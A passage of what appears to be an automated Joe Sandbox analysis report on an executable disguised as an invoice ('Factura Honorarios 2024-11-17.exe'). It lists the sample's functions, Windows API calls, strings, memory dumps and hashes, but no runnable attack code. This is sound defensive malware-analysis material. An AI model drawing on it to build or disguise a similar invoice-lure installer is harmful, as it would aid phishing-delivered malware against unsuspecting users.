                                                                                                                                  • Associated: 00000000.00000002.1871819266.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                                                                                                  • String ID: %ls=%ls$[Rename]
                                                                                                                                  • API String ID: 2171350718-461813615
                                                                                                                                  • Opcode ID: 452d6bb901878c0c7833dd9b0da621d42dccc5e8693507b5b61e49e3263f6faa
                                                                                                                                  • Instruction ID: cb5629e100ec4411e7767e9ff1715c79388972a83a2f5f57e92a2ee479f5e204
                                                                                                                                  • Opcode Fuzzy Hash: 452d6bb901878c0c7833dd9b0da621d42dccc5e8693507b5b61e49e3263f6faa
                                                                                                                                  • Instruction Fuzzy Hash: 92313571240B19BBD230AB659D48F6B3A5CEF45744F15003BF906F72D2EA7C98118ABD
                                                                                                                                  Function 00406518 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • CharNextW.USER32(?,*?|<>/":,00000000,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe",00403334,C:\Users\user\AppData\Local\Temp\,75573420,004035A3,?,00000006,00000008,0000000A), ref: 0040657B
                                                                                                                                  • CharNextW.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 0040658A
                                                                                                                                  • CharNextW.USER32(?,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe",00403334,C:\Users\user\AppData\Local\Temp\,75573420,004035A3,?,00000006,00000008,0000000A), ref: 0040658F
                                                                                                                                  • CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe",00403334,C:\Users\user\AppData\Local\Temp\,75573420,004035A3,?,00000006,00000008,0000000A), ref: 004065A2
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1871642625.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1871626525.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871665427.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871819266.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Char$Next$Prev
                                                                                                                                  • String ID: "C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                                                                                                  • API String ID: 589700163-1721811535
                                                                                                                                  • Opcode ID: f2dbc7d310367101a7bf5127f564121aa95c210a65fb008c6410ea5a4ac792ac
                                                                                                                                  • Instruction ID: 9d8e3f8f3784457604ea521ff392e3c8e3efc90107dbe880bee10e7696629eb6
                                                                                                                                  • Opcode Fuzzy Hash: f2dbc7d310367101a7bf5127f564121aa95c210a65fb008c6410ea5a4ac792ac
                                                                                                                                  • Instruction Fuzzy Hash: AB11B655800616A5DB303B18BC44A7762F8AF54B60F92403FED89736C5F77C5C9286BD
                                                                                                                                  Function 00404262 Relevance: 12.1, APIs: 8, Instructions: 68COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetWindowLongW.USER32(?,000000EB), ref: 0040427F
                                                                                                                                  • GetSysColor.USER32(00000000), ref: 004042BD
                                                                                                                                  • SetTextColor.GDI32(?,00000000), ref: 004042C9
                                                                                                                                  • SetBkMode.GDI32(?,?), ref: 004042D5
                                                                                                                                  • GetSysColor.USER32(?), ref: 004042E8
                                                                                                                                  • SetBkColor.GDI32(?,?), ref: 004042F8
                                                                                                                                  • DeleteObject.GDI32(?), ref: 00404312
                                                                                                                                  • CreateBrushIndirect.GDI32(?), ref: 0040431C
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1871642625.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1871626525.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871665427.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871819266.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2320649405-0
                                                                                                                                  • Opcode ID: cedac81959eb3ef19a74f908d68e4e703a61b794166ebd5b231b869c6a402091
                                                                                                                                  • Instruction ID: 0f30b588a8d7f9bbf1461c481b53b443173021fc121084549064eaca6d41b1d8
                                                                                                                                  • Opcode Fuzzy Hash: cedac81959eb3ef19a74f908d68e4e703a61b794166ebd5b231b869c6a402091
                                                                                                                                  • Instruction Fuzzy Hash: CD2174716007059FCB319F68DE48A5BBBF8AF81711B048A3EFD96A26E0D734D944CB54
                                                                                                                                  Function 0040264A Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 153fileCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • ReadFile.KERNEL32(?,?,?,?), ref: 004026B6
                                                                                                                                  • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 004026F1
                                                                                                                                  • SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 00402714
                                                                                                                                  • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 0040272A
                                                                                                                                    • Part of subcall function 00405E5B: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 00405E71
                                                                                                                                  • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 004027D6
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1871642625.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1871626525.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871665427.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871819266.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: File$Pointer$ByteCharMultiWide$Read
                                                                                                                                  • String ID: 9
                                                                                                                                  • API String ID: 163830602-2366072709
                                                                                                                                  • Opcode ID: c1a2398a3cf68ffccba9bba39206efc2048042628f08e4a72376123c44d13fd0
                                                                                                                                  • Instruction ID: 3d8386ac743f87b5a59d0c6af2c48158715b6bf8f4fdb2ba716f86882e7a1e00
                                                                                                                                  • Opcode Fuzzy Hash: c1a2398a3cf68ffccba9bba39206efc2048042628f08e4a72376123c44d13fd0
                                                                                                                                  • Instruction Fuzzy Hash: 46510A74D10219AEDF219F95DA88AAEB779FF04304F50443BE901F72D1D7B49982CB58
                                                                                                                                  Function 00404BB6 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404BD1
                                                                                                                                  • GetMessagePos.USER32 ref: 00404BD9
                                                                                                                                  • ScreenToClient.USER32(?,?), ref: 00404BF3
                                                                                                                                  • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404C05
                                                                                                                                  • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404C2B
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1871642625.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1871626525.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871665427.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871819266.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Message$Send$ClientScreen
                                                                                                                                  • String ID: f
                                                                                                                                  • API String ID: 41195575-1993550816
                                                                                                                                  • Opcode ID: e2d2d6aa42d138b4bf43a857dc2fb8cfa63f2fbdf5f441295addbf44c9bf4daa
                                                                                                                                  • Instruction ID: ae0188e128420319643ad50796f74bd77cac7447aa244d18a8bf097087cf05ab
                                                                                                                                  • Opcode Fuzzy Hash: e2d2d6aa42d138b4bf43a857dc2fb8cfa63f2fbdf5f441295addbf44c9bf4daa
                                                                                                                                  • Instruction Fuzzy Hash: 9C019E7190021CBAEB00DB94DD81BFFBBBCAF95711F10412BBB10B61D0C7B499418BA4
                                                                                                                                  Function 00402DF3 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40timeCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402E11
                                                                                                                                  • MulDiv.KERNEL32(000AB431,00000064,000AB435), ref: 00402E3C
                                                                                                                                  • wsprintfW.USER32 ref: 00402E4C
                                                                                                                                  • SetWindowTextW.USER32(?,?), ref: 00402E5C
                                                                                                                                  • SetDlgItemTextW.USER32(?,00000406,?), ref: 00402E6E
                                                                                                                                  Strings
                                                                                                                                  • verifying installer: %d%%, xrefs: 00402E46
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1871642625.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1871626525.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871665427.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871819266.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Text$ItemTimerWindowwsprintf
                                                                                                                                  • String ID: verifying installer: %d%%
                                                                                                                                  • API String ID: 1451636040-82062127
                                                                                                                                  • Opcode ID: 66d2592fca5784473147c8150b099ced33c2aea089bdfd78c1b867d04e1d1f0a
                                                                                                                                  • Instruction ID: 4bcbb139cde21edcf0ff7b700e9789e452b98774f77cb7efe3bd4e4e9d403b43
                                                                                                                                  • Opcode Fuzzy Hash: 66d2592fca5784473147c8150b099ced33c2aea089bdfd78c1b867d04e1d1f0a
                                                                                                                                  • Instruction Fuzzy Hash: C701F47154020CABDF209F60DE49FAA3B69EB44705F008439FA45B51E0DBB995558F98
                                                                                                                                  Function 6FF4256D Relevance: 9.1, APIs: 6, Instructions: 109COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 6FF4121B: GlobalAlloc.KERNEL32(00000040,?,6FF4123B,?,6FF412DF,00000019,6FF411BE,-000000A0), ref: 6FF41225
                                                                                                                                  • GlobalFree.KERNEL32(?), ref: 6FF4265B
                                                                                                                                  • GlobalFree.KERNEL32(00000000), ref: 6FF42690
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1913284405.000000006FF41000.00000020.00000001.01000000.00000004.sdmp, Offset: 6FF40000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1913259561.000000006FF40000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1913297381.000000006FF43000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1913309870.000000006FF45000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_6ff40000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Global$Free$Alloc
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1780285237-0
                                                                                                                                  • Opcode ID: 4938daf1278d790891e81f961bee6d6d801dce33f878162fe332b3114ef93a38
                                                                                                                                  • Instruction ID: 0e4dc2ca5478a03c421b6f30823301b7b53c85657c7f8207a725e905dc1edcff
                                                                                                                                  • Opcode Fuzzy Hash: 4938daf1278d790891e81f961bee6d6d801dce33f878162fe332b3114ef93a38
                                                                                                                                  • Instruction Fuzzy Hash: 0D310032114601EFCB119F68C998D2ABFB6FF9B318B10063DF541C3362C732A8699B15
                                                                                                                                  Function 004028AD Relevance: 9.1, APIs: 6, Instructions: 86memoryfileCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000), ref: 00402901
                                                                                                                                  • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 0040291D
                                                                                                                                  • GlobalFree.KERNEL32(?), ref: 00402956
                                                                                                                                  • GlobalFree.KERNEL32(00000000), ref: 00402969
                                                                                                                                  • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,000000F0), ref: 00402981
                                                                                                                                  • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000), ref: 00402995
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1871642625.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1871626525.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871665427.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871819266.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2667972263-0
                                                                                                                                  • Opcode ID: de92c1bd6f77b34e2ba4b4bc505dbe4f635d2773414333dd82a7c43b5c6c5a79
                                                                                                                                  • Instruction ID: 08f8d52deffd015bf7aba9006bc7b8b19cff7c85b8e7ef16137ebd65050c2e74
                                                                                                                                  • Opcode Fuzzy Hash: de92c1bd6f77b34e2ba4b4bc505dbe4f635d2773414333dd82a7c43b5c6c5a79
                                                                                                                                  • Instruction Fuzzy Hash: 1B218071C00528BBCF116FA5DE49D9E7E79EF08364F10023AF954762E1CB794D419B98
                                                                                                                                  Function 00404AA8 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 84stringCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • lstrlenW.KERNEL32(004236E8,004236E8,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404B49
                                                                                                                                  • wsprintfW.USER32 ref: 00404B52
                                                                                                                                  • SetDlgItemTextW.USER32(?,004236E8), ref: 00404B65
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1871642625.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1871626525.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871665427.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871819266.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ItemTextlstrlenwsprintf
                                                                                                                                  • String ID: %u.%u%s%s$6B
                                                                                                                                  • API String ID: 3540041739-3884863406
                                                                                                                                  • Opcode ID: 4da95cfef184c8e5e741e241c615311e7070c24a3f1e6bca6f3b0d0e52bef44f
                                                                                                                                  • Instruction ID: 22ef8b20c3cb34d9681d0f1950c5ee3b7e818b69147609aa9b6e87f13a537159
                                                                                                                                  • Opcode Fuzzy Hash: 4da95cfef184c8e5e741e241c615311e7070c24a3f1e6bca6f3b0d0e52bef44f
                                                                                                                                  • Instruction Fuzzy Hash: 18110833A041283BDB10A96D9C46F9F329CDB85374F250237FA26F21D1DA79DC2182E8
                                                                                                                                  Function 00402598 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 69stringCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • WideCharToMultiByte.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\nsg8E1D.tmp,000000FF,C:\Users\user\AppData\Local\Temp\nsg8E1D.tmp\System.dll,00000400,?,?,00000021), ref: 004025E8
                                                                                                                                  • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsg8E1D.tmp\System.dll,?,?,C:\Users\user\AppData\Local\Temp\nsg8E1D.tmp,000000FF,C:\Users\user\AppData\Local\Temp\nsg8E1D.tmp\System.dll,00000400,?,?,00000021), ref: 004025F3
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1871642625.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1871626525.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871665427.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871819266.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ByteCharMultiWidelstrlen
                                                                                                                                  • String ID: C:\Users\user\AppData\Local\Temp\nsg8E1D.tmp$C:\Users\user\AppData\Local\Temp\nsg8E1D.tmp\System.dll
                                                                                                                                  • API String ID: 3109718747-1825216331
                                                                                                                                  • Opcode ID: d16774647d0c3b57a9c0354c15aa2feef0a14e9a17d8eebea2b137cd7cb3cc12
                                                                                                                                  • Instruction ID: 3dcd1766983357fa33eb9a2b17af164457a9c6038e68ae70dd04151361e6fae4
                                                                                                                                  • Opcode Fuzzy Hash: d16774647d0c3b57a9c0354c15aa2feef0a14e9a17d8eebea2b137cd7cb3cc12
                                                                                                                                  • Instruction Fuzzy Hash: D7110872A00300BEDB146BB1CE89A9F76649F54389F20843BF502F61D1DAFC89425B6E
                                                                                                                                  Function 6FF418DD Relevance: 7.7, APIs: 5, Instructions: 194COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1913284405.000000006FF41000.00000020.00000001.01000000.00000004.sdmp, Offset: 6FF40000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1913259561.000000006FF40000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1913297381.000000006FF43000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1913309870.000000006FF45000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_6ff40000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: FreeGlobal
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2979337801-0
                                                                                                                                  • Opcode ID: 9d52669327ea956fa11a513b7793425792b87235c8a725403f9f950f85121d21
                                                                                                                                  • Instruction ID: 22101c31e0137e0380d6af533d7689dddc770d31ef5a7dd7dde1579c8fd82b76
                                                                                                                                  • Opcode Fuzzy Hash: 9d52669327ea956fa11a513b7793425792b87235c8a725403f9f950f85121d21
                                                                                                                                  • Instruction Fuzzy Hash: 9C510832E141199ACB239FB885806ADBFB5EF46314B0043EBD510E7153D771BAB187B1
                                                                                                                                  Function 6FF42398 Relevance: 7.6, APIs: 5, Instructions: 135memoryCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GlobalFree.KERNEL32(00000000), ref: 6FF424DA
